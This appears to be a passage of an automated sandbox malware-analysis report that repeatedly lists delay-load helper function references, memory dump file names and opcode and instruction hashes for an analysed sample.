Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a1678f8c87465d6e9fc6b26e09d03b747584115a387a9015b1e226455f2b6ea
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 5a1678f8c87465d6e9fc6b26e09d03b747584115a387a9015b1e226455f2b6ea
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2c33a8fcb3f5c66c1d7e3ef9ea4ed60e612c63010b18e70bab09d6a1005f853f
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 2c33a8fcb3f5c66c1d7e3ef9ea4ed60e612c63010b18e70bab09d6a1005f853f
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3f8e62a1caf93e2a7eb1ac4baae64a302c5d06fd2a652d9161ebc348e68c6b82
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 3f8e62a1caf93e2a7eb1ac4baae64a302c5d06fd2a652d9161ebc348e68c6b82
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 02bca6b7d8ff0a0b649fcebb8a6f2b21ef04dc5c3735fc9171dacecee65218c8
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 02bca6b7d8ff0a0b649fcebb8a6f2b21ef04dc5c3735fc9171dacecee65218c8
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8d4c684070fd060141c98e3a8d3a55ef4d880ab5c7a8f07fbf482b429e44e820
Instruction ID: 5f73c5cbcd526a806473baaa828b9b3dc824ab9ca89b027a2af4bc42ca52db77
Opcode Fuzzy Hash: 8d4c684070fd060141c98e3a8d3a55ef4d880ab5c7a8f07fbf482b429e44e820
Instruction Fuzzy Hash: BEA012D1B6C0037D300831007C16C36130DC8D0B20330440AB047940C1D84058084430

Function 00D6DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a17b8633424830625a445a358775ae591682739364983ebd8b9be42f3c488617
Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
Opcode Fuzzy Hash: a17b8633424830625a445a358775ae591682739364983ebd8b9be42f3c488617
Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931

Function 00D6DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 03093891cb050dcd0791aa9e4057fa2b63c2bedb37707dd1fac05a51709deb36
Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
Opcode Fuzzy Hash: 03093891cb050dcd0791aa9e4057fa2b63c2bedb37707dd1fac05a51709deb36
Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931

Function 00D6DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 63a5c545da5dceddf04db35381c0239c57a063e596319c002e1d43ab9136029f
Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
Opcode Fuzzy Hash: 63a5c545da5dceddf04db35381c0239c57a063e596319c002e1d43ab9136029f
Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931

Function 00D6DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9d5c5034096f1fe1549a24755831c7243270599d3355ce01c3a6d46625b6c9cd
Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
Opcode Fuzzy Hash: 9d5c5034096f1fe1549a24755831c7243270599d3355ce01c3a6d46625b6c9cd
Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931

Function 00D6DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c1385074bd02b01dd54a096d6c7e59edeb79b3196b65b1ca43c8b5829f16081a
Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
Opcode Fuzzy Hash: c1385074bd02b01dd54a096d6c7e59edeb79b3196b65b1ca43c8b5829f16081a
Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931

Function 00D6DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f831d4b88931bcf000427c2627871e8349c412b7186732c9807ca8678f79212b
Instruction ID: 91c8f7f53a9c558b5b59a69e1413e6c65b18b815d564d0750f967ea63150cfcf
Opcode Fuzzy Hash: f831d4b88931bcf000427c2627871e8349c412b7186732c9807ca8678f79212b
Instruction Fuzzy Hash: 09A001E6BAD5427E3148B292BD16D3A225ED8E0B22334861BB44BA408AE99898495931

Function 00D6DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6388f300cb45f8f8e345a7ac111d6fde53517eead2728d8325638e9989b312a4
Instruction ID: f60019751a0afaa2604b6f988cb97fb5c4396330d842224cdeaa00950ffe47e2
Opcode Fuzzy Hash: 6388f300cb45f8f8e345a7ac111d6fde53517eead2728d8325638e9989b312a4
Instruction Fuzzy Hash: 0CA011EABAC003BE300822003C0BC3A222EC8C0B20330880AB00A80080EE808C088030

Function 00D6DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ec82ab6d2d9cab0d1bebc147bebef68e6aa8a810f74cbb52e18e0c738816d11a
Instruction ID: 39269f8cf192306b3ef321f0304c0c7514a97806136fa0cb3f34193f60a0dc7d
Opcode Fuzzy Hash: ec82ab6d2d9cab0d1bebc147bebef68e6aa8a810f74cbb52e18e0c738816d11a
Instruction Fuzzy Hash: 89A011EABAC203BE300CB2203C02C3A222EC8C8B20330880AB00AE0080EA80AC088030

Function 00D6DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6be2d8afa01cf7642db4be852cf151c370dbd2e93bd803ce2b378e59f8069875
Instruction ID: 39269f8cf192306b3ef321f0304c0c7514a97806136fa0cb3f34193f60a0dc7d
Opcode Fuzzy Hash: 6be2d8afa01cf7642db4be852cf151c370dbd2e93bd803ce2b378e59f8069875
Instruction Fuzzy Hash: 89A011EABAC203BE300CB2203C02C3A222EC8C8B20330880AB00AE0080EA80AC088030

Function 00D6DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e72df58bdf78a69c41e7577345280b9b6ef50770884ed8b89972ab69ffc8dc59
Instruction ID: f60019751a0afaa2604b6f988cb97fb5c4396330d842224cdeaa00950ffe47e2
Opcode Fuzzy Hash: e72df58bdf78a69c41e7577345280b9b6ef50770884ed8b89972ab69ffc8dc59
